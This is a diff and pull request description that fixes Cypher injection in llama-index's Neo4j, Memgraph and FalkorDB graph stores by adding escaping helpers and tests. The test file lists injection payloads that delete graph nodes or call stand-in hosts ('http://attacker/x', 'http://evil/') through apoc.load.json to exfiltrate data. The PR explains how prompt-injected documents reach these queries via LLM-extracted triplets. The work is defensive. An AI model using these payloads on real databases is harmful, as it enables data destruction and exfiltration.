             WHERE e.id = id_list[idx]
-            MATCH p=(e)-[r*1..{depth}]-(other)
+            MATCH p=(e)-[r*1..{escape_int(depth, "depth")}]-(other)
             WHERE ALL(rel in relationships(p) WHERE type(rel) <> 'MENTIONS')
             UNWIND relationships(p) AS rel
             WITH distinct rel, idx
@@ -757,7 +763,9 @@ class Neo4jPropertyGraphStore(PropertyGraphStore):
 
         if relation_names:
             for rel in relation_names:
-                self.structured_query(f"MATCH ()-[r:`{rel}`]->() DELETE r")
+                self.structured_query(
+                    f"MATCH ()-[r:{escape_identifier(rel)}]->() DELETE r"
+                )
 
         if properties:
             cypher = "MATCH (e) WHERE "
@@ -777,9 +785,9 @@ class Neo4jPropertyGraphStore(PropertyGraphStore):
         is_relationship: bool = False,
     ) -> str:
         if is_relationship:
-            match_clause = f"MATCH ()-[n:`{label_or_type}`]->()"
+            match_clause = f"MATCH ()-[n:{escape_identifier(label_or_type)}]->()"
         else:
-            match_clause = f"MATCH (n:`{label_or_type}`)"
+            match_clause = f"MATCH (n:{escape_identifier(label_or_type)})"
 
         with_clauses = []
         return_clauses = []
@@ -852,7 +860,8 @@ class Neo4jPropertyGraphStore(PropertyGraphStore):
                     ):
                         distinct_values = self.query(
                             f"CALL apoc.schema.properties.distinct("
-                            f"'{label_or_type}', '{prop_name}') YIELD value"
+                            f"'{escape_string_literal(label_or_type)}', "
+                            f"'{escape_string_literal(prop_name)}') YIELD value"
                         )[0]["value"]
                         return_clauses.append(
                             f"values: {distinct_values},"

--- a/llama-index-integrations/graph_stores/llama-index-graph-stores-neo4j/tests/test_cypher_escape.py
+++ b/llama-index-integrations/graph_stores/llama-index-graph-stores-neo4j/tests/test_cypher_escape.py
@@ -1,0 +1,85 @@
+"""Tests for Cypher identifier escaping."""
+
+import pytest
+
+from llama_index.graph_stores.neo4j.cypher_escape import (
+    escape_identifier,
+    escape_int,
+    escape_string_literal,
+)
+
+# Payloads taken from a Cypher-injection report against these graph stores. Each
+# one previously terminated the interpolated identifier and appended clauses.
+INJECTION_PAYLOADS = [
+    "OWNS]->() WITH 1 AS _ CALL apoc.load.json('http://attacker/x') YIELD value "
+    "WITH value, _ MATCH (x) SET x.leak = apoc.convert.toJson(value) //",
+    "A`]->(N2)\tWITH\t1\tAS\tX\tMATCH\t(Z)\tDETACH\tDELETE\tZ\t//",
+    "OWNS`]->(n2:`Entity`) MATCH (s:Secret) SET s.pwned = true WITH n1, r, n2 //",
+    "X`]->() DETACH DELETE n1 //",
+]
+
+
+def test_escape_identifier_wraps_in_backticks():
+    assert escape_identifier("OWNS") == "`OWNS`"
+
+
+@pytest.mark.parametrize("value", ["has space", "is-a", "HAS_SPACE", "Ünïcode", "a.b"])
+def test_escape_identifier_preserves_legitimate_values(value):
+    """Values that are legal in a quoted identifier must keep working."""
+    escaped = escape_identifier(value)
+    assert escaped == f"`{value}`"
+
+
+@pytest.mark.parametrize("value", ["", None, 3, b"OWNS"])
+def test_escape_identifier_rejects_non_identifiers(value):
+    with pytest.raises(ValueError):
+        escape_identifier(value)
+
+
+def test_escape_identifier_rejects_null_byte():
+    with pytest.raises(ValueError):
+        escape_identifier("OW\x00NS")
+
+
+@pytest.mark.parametrize("payload", INJECTION_PAYLOADS)
+def test_injection_payloads_cannot_terminate_the_identifier(payload):
+    """
+    The escaped result must be a single quoted identifier: it opens and closes
+    with a backtick, and every interior backtick is doubled, so nothing in the
+    payload can be parsed as Cypher.
+    """
+    escaped = escape_identifier(payload)
+    assert escaped.startswith("`") and escaped.endswith("`")
+    interior = escaped[1:-1]
+    # No lone backtick remains, so the identifier cannot be closed early.
+    assert "`" not in interior.replace("``", "")
+
+
+@pytest.mark.parametrize(("value", "expected"), [(3, 3), ("3", 3), (0, 0), (-1, -1)])
+def test_escape_int_accepts_integers(value, expected):
+    assert escape_int(value, "depth") == expected
+
+
+@pytest.mark.parametrize(
+    "value",
+    [
+        "2]->() WITH 1 AS _ CREATE (:PWNED) //",
+        "30 CREATE (:PWNED)",
+        "2.5",
+        None,
+        "",
+    ],
+)
+def test_escape_int_rejects_non_integers(value):
+    with pytest.raises(ValueError):
+        escape_int(value, "depth")
+
+
+def test_escape_string_literal_escapes_quotes_and_backslashes():
+    assert escape_string_literal("O'Brien") == "O\\'Brien"
+    assert escape_string_literal("back\\slash") == "back\\\\slash"
+
+
+def test_escape_string_literal_neutralises_breakout():
+    escaped = escape_string_literal("x') YIELD value CALL apoc.load.json('http://evil/")
+    assert "'" not in escaped.replace("\\'", "")


### PR DESCRIPTION
### Problem

The three graph-store integrations build Cypher by interpolating caller-supplied
values into the query text. `subj` and `obj` are correctly bound as driver
parameters, but the relationship type and label channels are not:

- `Neo4jGraphStore.delete()` → `delete_rel()` interpolates `rel` via `.format()`
  with no quoting and no normalisation at all (`neo4j/base.py:178-189`).
- `MemgraphGraphStore.delete()` interpolates `rel` inside backticks with no
  filtering (`memgraph/kg_base.py:138-145`).
- The `upsert_triplet()` methods on all three stores apply
  `rel.replace(" ", "_").upper()` inside backticks. That replaces the literal
  space U+0020 only, so a TAB passes straight through and closes the backtick.
- The property-graph stores interpolate `rel` and `label_or_type` into backticked
  patterns, and `memgraph/property_graph.py:823` uses `MATCH (n:{label_or_type})`
  with no backticks at all.
- `get_rel_map()` interpolates `depth` and `limit` into the query, and the Neo4j
  version interpolates a Python `repr` of `subjs` while passing an unused
  `$subjs` parameter alongside.

These are reachable from `KnowledgeGraphIndex.upsert_triplet()` with
LLM-extracted triplets, so a prompt-injected document can drive `rel`; from
agent/MCP tool wrappers exposing `delete_triplet`; and from any application that
puts these methods behind a request endpoint.

I verified at runtime against Neo4j 5.26 + APOC Core, Memgraph and FalkorDB that
on a default installation this yields arbitrary Cypher execution — full read of
the graph, arbitrary writes, `DETACH DELETE` of everything — plus SSRF
originating from the Neo4j host via `apoc.load.json('http://…')`, with the
response body exfiltrated back into the graph. Reported responsibly via huntr
beforehand; happy to share the full reproduction bundle privately.

### Fix

Labels and relationship types cannot be passed as query parameters, so they have
to be interpolated. Each package gains a small `cypher_escape` module and every
interpolation site now goes through it:

- `escape_identifier()` wraps the value in backticks and doubles any backtick it
  contains, which is Cypher's own escaping rule for a quoted identifier.
- `escape_int()` coerces `depth` / `limit` and rejects anything non-integral.
- `escape_string_literal()` escapes the two values embedded in a single-quoted
  procedure argument rather than an identifier
  (`neo4j_property_graph.py:855`).
- Neo4j's `get_rel_map()` now uses the `$subjs` parameter that was already being
  passed, instead of interpolating a Python list repr.

### Why escaping rather than an allow-list

An allow-list such as `^[A-Za-z_][A-Za-z0-9_]*$` would be simpler, but it is a
breaking change: relationship types and labels containing hyphens, dots or
non-ASCII characters are legal today inside backticks and are common in
knowledge graphs built from non-English text. Escaping closes the hole without
changing behaviour for any value that works now. Verified still working:
`has space` (normalised to `HAS_SPACE` as before), `is-a`, `Ünïcode`.

One deliberate asymmetry: **FalkorDB's parser does not accept a doubled backtick
as an escaped backtick** — it errors with ``Invalid input '`'``. A value
containing a backtick therefore cannot be represented safely there, so the
FalkorDB helper rejects it rather than emitting something unsafe. Neo4j and
Memgraph both accept the doubled form and preserve the literal value.

`rel.replace(" ", "_").upper()` is **retained**, because it normalises stored
relationship-type names and removing it would rename relationships in existing
graphs. It is no longer relied on for safety, and there is a comment at each site
saying so.

### Verification

Executed against live Neo4j 5.26.28 Community + APOC Core, Memgraph latest and
FalkorDB 1.6.2, before and after this change:

| Attack | Before | After |
|---|---|---|
| SSRF + exfiltration via `Neo4jGraphStore.delete()` | outbound request made, response written onto a node | no request, no data written |
| TAB filter bypass via `upsert_triplet()`, all three stores | graph destroyed (3→0, 2→0, 2→0 nodes) | graph intact |
| Read/tamper of unrelated nodes via Memgraph `delete()` | unrelated node read and modified | untouched |
| `depth` injection via `get_rel_map()` | attacker node created | rejected with `ValueError` |
| Legitimate `upsert_triplet` / `get` / `get_rel_map`, and rel types with spaces, hyphens and non-ASCII | works | works |

### Test plan

- [x] `tests/test_cypher_escape.py` added to each package — 79 tests, no database
      required, so they run in CI. They cover the escaping rules, the integer
      coercion and the string-literal escaping, and assert that each injection
      payload used above cannot terminate the interpolated identifier.
- [x] `pre-commit run` clean over all 12 changed files, including the pinned
      `ruff`, `ruff-format` and `mypy` hooks.
- [ ] The existing integration tests need live databases
      (`NEO4J_URI` / `NEO4J_USERNAME` / `NEO4J_PASSWORD`, or Docker for
      FalkorDB), so they were not run in CI here — I did run the equivalent
      operations manually against all three, as above.

Happy to split this per package if you would rather review three smaller PRs.
